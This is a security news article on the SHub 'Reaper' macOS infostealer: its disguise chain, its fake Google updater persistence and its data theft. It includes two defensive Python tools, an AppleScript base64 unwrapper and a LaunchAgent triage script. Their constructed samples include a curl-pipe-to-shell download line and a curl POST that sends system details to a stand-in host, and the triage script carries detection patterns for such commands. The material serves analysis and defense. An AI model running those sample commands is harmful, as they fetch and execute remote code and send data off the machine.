macOS users face a new threat: a variant of the SHub infostealer, known as ‘Reaper,’ has emerged. It establishes persistence on compromised systems through a fake Google Software Update LaunchAgent. Reaper is particularly insidious because every stage borrows the name of a trusted vendor, so a user (or a casual look at the file system) sees nothing that stands out; spotting it reliably requires a security tool or a deliberate check of what the "updater" actually is.
Complex Disguise Tactics
The Reaper malware is notable for changing its disguise at each stage of the infection chain. Victims first encounter fake installers for popular apps such as WeChat or Miro, distributed from domains that closely resemble those associated with Microsoft. Once the malicious payload runs, it presents itself as an Apple security update, and its persistence mechanism hides in directories that imitate Google’s software update service. The attack thus trades on the reputations of three major vendors in a single chain.
Researchers from SentinelOne have conducted a thorough analysis of this Reaper variant. Their findings reveal that the malware is a continuation of the expanding SHub malware family, which has seen significant growth over the past two years. The team highlighted the malware’s use of typo-squatted domains for its operation and its reliance on AppleScript to evade typical detection methods.
Technical Details and Impact
Reaper sidesteps Apple’s mitigation for commands pasted into Terminal by having the victim run the script in Script Editor instead, and the command it executes is constructed dynamically from base64-encoded pieces, so nothing readable appears in the visible script. The malware checks the local settings for Russian-language input sources; if one is present, it contacts its command and control server and exits. Otherwise it executes a second AppleScript in memory, so that stage never touches the local disk and leaves no file for an analyst to recover.
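The following is an added example, not SentinelOne's tooling or the malware's own code, showing how an analyst recovers the hidden command from an AppleScript of the kind described above: it collapses the `"a" & "b"` string concatenation AppleScript uses to split a command into pieces, then follows each `echo <base64> | base64 -d` layer down to the plaintext. The sample script, its payload, and the `updates.example.invalid` URL are constructed for the demonstration and are not indicators from the report.

```python
"""Unwrap base64 stages hidden inside an AppleScript 'do shell script' command."""
import base64
import re

# "echo <b64> | base64 -d"; macOS base64 also accepts -D, so match that too.
B64_PIPE = re.compile(
    r"""echo\s+['"]?([A-Za-z0-9+/=]{16,})['"]?\s*\|\s*base64\s+(?:-d|-D|--decode)"""
)
# Two adjacent AppleScript string literals joined with '&'.
CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def join_applescript_strings(src: str) -> str:
    """Collapse "ec" & "ho" & "..." into a single literal so the command is readable."""
    prev = None
    while prev != src:
        prev = src
        src = CONCAT.sub(lambda m: f'"{m.group(1)}{m.group(2)}"', src)
    return src


def unwrap_stages(src: str, max_depth: int = 5) -> list:
    """Return each decoded stage in order, following nested base64 layers."""
    stages = []
    current = join_applescript_strings(src)
    for _ in range(max_depth):
        match = B64_PIPE.search(current)
        if not match:
            break
        try:
            decoded = base64.b64decode(match.group(1), validate=True)
        except (ValueError, TypeError):
            break
        text = decoded.decode("utf-8", "replace")
        stages.append(text)
        current = join_applescript_strings(text)
    return stages


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample (assumption): a two-layer chain in the style the article describes.
FINAL_COMMAND = "curl -s https://updates.example.invalid/stage2 | sh"
STAGE1 = f"echo '{_b64(FINAL_COMMAND)}' | base64 -d | sh"
SAMPLE_APPLESCRIPT = (
    'do shell script "ec" & "ho " & "' + _b64(STAGE1) + '" & " | base64 -d | bash"'
)

if __name__ == "__main__":
    for depth, stage in enumerate(unwrap_stages(SAMPLE_APPLESCRIPT), start=1):
        print(f"stage {depth}: {stage}")
```

Run it against the text of a suspicious `.scpt` export or an `osascript -e` argument from process telemetry; the last element of the returned list is the command that would actually have executed.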
To maintain persistence, Reaper creates a directory tree that mimics Google’s Keystone update service. It writes a base64-decoded bash script named GoogleUpdate to ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ and registers a LaunchAgent property list that launches the script every 60 seconds. Each run uploads system details to the attacker’s server, which gives the operator a persistent remote execution channel. Two things give it away on inspection: the "updater" is a shell script rather than a Mach-O binary, and it lives under Application Support rather than where Google’s own updater is installed.
Data Exfiltration and Security Advice
Reaper includes a FileGrabber routine that scans for files of likely business or financial value, filtering by file type and size: documents, images, and files belonging to cryptocurrency applications. It also harvests browser credentials and developer keystrokes, and it employs techniques to hinder analysis.
SentinelOne advises users to distrust any website that claims a manual security update requires running a script: Apple never asks users to paste commands into Script Editor or Terminal. Users should verify URLs and download software only from official sources. Defenders are urged to monitor for unexpected AppleScript and osascript activity, unusual outbound connections, and new LaunchAgents whose labels or paths borrow a trusted vendor’s name but whose program lives outside that vendor’s normal install location.
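As an added example (not SentinelOne's tooling or any published detection), the script below turns the persistence description and the monitoring advice above into a LaunchAgent triage check. It parses each plist, flags a vendor-branded updater that lives under ~/Library/Application Support or outside the vendor's real install root, flags a beacon-like StartInterval, and, if the program file is readable, flags a shell script standing in for a Mach-O binary and the upload/decoding commands such a script tends to contain. The two plists and the script body are constructed to match the shape the article describes, not real indicators; the assumed location of Google's genuine Keystone agent (~/Library/Google/GoogleSoftwareUpdate) and the `updates.example.invalid` host are assumptions, not facts from the report.

```python
"""Triage user LaunchAgents for persistence dressed up as a vendor updater."""
import plistlib
import re
from pathlib import Path
from typing import List, Optional

VENDORS = ("google", "apple", "microsoft")
# Assumption: where the genuine Google Keystone agent installs (not from the article).
LEGIT_ROOTS = {"google": ("/library/google/googlesoftwareupdate/",)}
SCRIPT_PATTERNS = {
    "base64 decode": r"base64\s+(?:-d|-D|--decode)",
    "curl upload": r"\bcurl\b[^\n]*(?:-d\b|--data|-F\b|-T\b|-X\s*POST)",
    "osascript": r"\bosascript\b",
}


def triage_launch_agent(plist_bytes: bytes, program_text: Optional[str] = None) -> List[str]:
    """Return a list of findings for one LaunchAgent plist (empty list = nothing odd)."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments") or []
    program = str(plist.get("Program") or (args[0] if args else ""))
    label = str(plist.get("Label", "")).lower()
    low = program.lower()
    findings = []
    vendor = next((v for v in VENDORS if v in low or label.startswith(f"com.{v}.")), None)
    if vendor:
        if "/library/application support/" in low:
            findings.append(f"{vendor}-branded updater under Application Support")
        roots = LEGIT_ROOTS.get(vendor, ())
        if roots and not any(r in low for r in roots):
            findings.append(f"borrows {vendor} name but program is outside {roots[0]}")
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval <= 300:
        findings.append(f"StartInterval {interval}s (beacon-like cadence)")
    if program_text is not None:
        if program_text.lstrip().startswith("#!"):
            findings.append("program is a script, not a Mach-O binary")
        for name, pattern in SCRIPT_PATTERNS.items():
            if re.search(pattern, program_text):
                findings.append(f"script contains {name}")
    return findings


def scan_launch_agents(directory: Path = Path.home() / "Library/LaunchAgents") -> dict:
    """Live use: triage every plist in a LaunchAgents directory, reading each program's head."""
    results = {}
    for plist_path in Path(directory).glob("*.plist"):
        data = plist_path.read_bytes()
        try:
            plist = plistlib.loads(data)
        except Exception:
            continue  # malformed plist: launchd would reject it anyway
        args = plist.get("ProgramArguments") or []
        program = Path(str(plist.get("Program") or (args[0] if args else "")))
        text = program.read_bytes()[:4096].decode("utf-8", "replace") if program.is_file() else None
        findings = triage_launch_agent(data, text)
        if findings:
            results[str(plist_path)] = findings
    return results


# Constructed sample in the shape the article describes (not a real IOC).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.GoogleUpdate</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate</string>
  </array>
  <key>StartInterval</key><integer>60</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed stand-in for the decoded GoogleUpdate script; the host is an assumption.
SAMPLE_SCRIPT = """#!/bin/bash
SYSINFO=$(sw_vers; whoami; uname -a)
curl -s -X POST --data "$SYSINFO" https://updates.example.invalid/api/report
"""

# Constructed benign plist modelled on the assumed layout of Google's real Keystone agent.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
  </array>
  <key>StartInterval</key><integer>3523</integer>
</dict></plist>"""

if __name__ == "__main__":
    print("sample:", triage_launch_agent(SAMPLE_PLIST, SAMPLE_SCRIPT))
    print("benign:", triage_launch_agent(BENIGN_PLIST))
```

The path and label checks are the ones worth tuning for your fleet: add the roots of any vendor updater you expect to see, so that a legitimate agent produces no findings and anything that merely borrows the name does.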
Indicators of compromise include typo-squatted domains, specific file paths, and API endpoints used by the malware. Users are encouraged to follow the latest updates on cybersecurity threats and implement robust security measures to protect their systems.
